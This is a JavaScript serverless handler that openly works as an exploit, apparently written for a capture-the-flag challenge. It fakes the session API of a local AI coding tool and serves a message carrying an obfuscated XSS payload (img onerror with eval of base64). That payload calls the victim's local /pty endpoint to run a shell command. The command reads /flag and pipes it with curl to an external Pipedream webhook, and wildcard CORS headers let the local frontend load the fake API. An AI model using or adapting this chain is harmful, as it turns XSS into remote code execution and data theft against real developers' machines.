export async function onRequest(context) {
  const url = new URL(context.request.url);
  const path = url.pathname;
  
  // 【1. 替换为你最新的 Webhook/Pipedream 地址】
  const webhook = "https://eofogki21jrjf3e.m.pipedream.net";

  // 【2. RCE 攻击代码】
  // 逻辑：修改权限 -> 读取 flag -> 发送到 Webhook
  const shellCmd = `chmod 444 /flag && cat /flag | curl -X POST -d @- ${webhook}`;
  
  const ptyJS = `(async () => {
    const payload = {
      'command': '/bin/sh',
      'args': ['-c', '${shellCmd}']
    };
    await fetch('/pty', {
      method: 'POST',
      body: JSON.stringify(payload),
      headers: { 'Content-Type': 'application/json' }
    });
    // 信号弹：确认 PTY 已经触发
    fetch("${webhook}/?status=PTY_TRIGGERED");
  })()`;

  // 将 JS 包装成 XSS (利用 img 标签的 onerror)
  const xssPayload = `<img src=x onerror="eval(atob('${btoa(ptyJS)}'))">`;

  // 【3. 跨域头 (CORS)】
  // 允许 http://127.0.0.1:4096 的前端请求我们这个 HTTPS 的 API
  const corsHeaders = {
    "Access-Control-Allow-Origin": "*",
    "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
    "Access-Control-Allow-Headers": "*",
    "Content-Type": "application/json;charset=UTF-8",
  };

  // 处理 OPTIONS 预检请求
  if (context.request.method === "OPTIONS") {
    return new Response(null, { headers: corsHeaders });
  }

  // --- API 路由模拟 ---

  // 1. 获取 Session 列表
  if (path.endsWith("/session") && !path.includes("ses_pwn")) {
    const data = [{
      "id": "ses_pwn",
      "version": "1.2.16",
      "projectID": "global",
      "directory": "/app",
      "title": "Pwned",
      "time": {"created": 1, "updated": 1},
      "summary": {"additions": 0, "deletions": 0, "files": 0}
    }];
    return new Response(JSON.stringify(data), { headers: corsHeaders });
  }

  // 2. 获取 Session 详情
  if (path.includes("/session/ses_pwn") && !path.endsWith("/message")) {
    const data = {
      "id": "ses_pwn",
      "version": "1.2.16",
      "projectID": "global",
      "directory": "/app",
      "title": "Pwned"
    };
    return new Response(JSON.stringify(data), { headers: corsHeaders });
  }

  // 3. 获取包含 XSS 的消息内容
  if (path.includes("/session/ses_pwn/message")) {
    const data = [{
      "parts": [{
        "id": "part_1",
        "sessionID": "ses_pwn",
        "type": "text",
        "text": xssPayload, // 这里注入恶意脚本
        "time": {"start": 1, "end": 1}
      }]
    }];
    return new Response(JSON.stringify(data), { headers: corsHeaders });
  }

  return new Response("Not Found", { status: 404, headers: corsHeaders });
}